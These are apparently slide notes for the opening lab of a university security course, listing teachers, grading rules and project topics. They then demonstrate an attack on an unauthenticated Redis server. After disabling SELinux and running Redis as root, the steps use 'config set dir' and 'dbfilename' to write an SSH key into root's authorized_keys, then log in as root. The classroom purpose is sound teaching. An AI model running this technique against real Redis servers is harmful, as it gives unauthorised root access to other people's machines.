Organisation
BSY

---
Introduce teachers

Tomas Pevny pevnak@protonmail.ch, boss of the course, staganography labs
Balazs Kutil balazs@kutilovi.cz, labs on fuzzing, web security
Josef Liska josef.liska@virtualmaster.com, labs on linux security, some network stuff
Vladislav Iliushin  iliushin@avast.com, labs on mobile malware and IoT (in)security

(things may change)

---
Before we start

- log in to your computer
- install virtualbox if you do not have one
- download prepared Centos7 image https://host.chl.cz/c7.vdi.gz


---
General info

Labs are compulsory.
- 1 absence will be tolerated
- but you will get special question about lab's topic during the exam.

More than 1 absence needs to be discussed individually.
- can be settled by some home project

---
Course is 6 credits.

Points:
- 10 - project
- 20 - exam

---
Project:

- 5-10 minutes on the beginning of the lab session
- we expect you to spend ~8-12 hrs by preparation
- can be in pairs, but then you should be going a bit deeper

---
How to motivate you to prepare your project early?

- 1.5 poins for early presenters ~ October
- 1.25 ~next 4 wees


Extra 5 points for the best in each lab group.


---
Skim the project topics on the moodle, we would
like to start assinging them today, all should
be assigned by the end of next lab.

We can discuss the topics for ~ 10 minuts today.

Possible additions to topics we just thought about:
- hommomorpic encryption
- DES cracker on GPU

---
Questionare:

- What are your favourite programming language?
- Git knowledge?
- Linux knowledge?
- OSI model?
- OWASP?
- Buffer owerflow?
- Encryption / Authentication
- Entropy

---
Materialized activity points

- we will be giving out about 5 materialized plus points

e.g.

- banannas
- chocolate

Do not be shy and raise your hands.
---
This lab

- boot the virtual machines from the image
- ideally, add host-only network interface

---
Do you know redis key-value database?

    systemctl start redis
    redis-cli
    keys *
    set "key" "value"
    keys *
    get "key"
    setex "key" 10 "value"

observe key is deleted automatically after 10 sec

----
Unfortunatelly, redis is "insecure by default".

e.g.
   redis-cli
   shutdown

---

You shoud not be able to perform admin commands without some restrictions


Fortunatelly, CentOS is reasonably secure by default,
so that following attack will not work out of the box.

We will deliberately switch off some security measures

---
    setenforce 0
    /usr/bin/redis-server &

- we have switched off SELinux
- redis is now running as root user, not redis

   mkdir -p /root/.ssh

---
Exploit

http://antirez.com/news/96

    generate an ssh key pair if you do not have one

    ssh-keygen -t rsa -N 'demo'
    cat ~/.ssh/id_rsa.pub

    copy to clipboard

---
Exploit ..

    set "somekey" "\n\n<paste ssh pubkey>\n\n"
    config set dir /root/.ssh/
    config set dbfilename "authorized_keys"
    save

---
     _                       _ 
  __| | ___   ___  _ __ ___ | |
 / _` |/ _ \ / _ \| '_ ` _ \| |
| (_| | (_) | (_) | | | | | |_|
 \__,_|\___/ \___/|_| |_| |_(_)

---
Test

   ssh root@192.168.56.101

---
Q&A
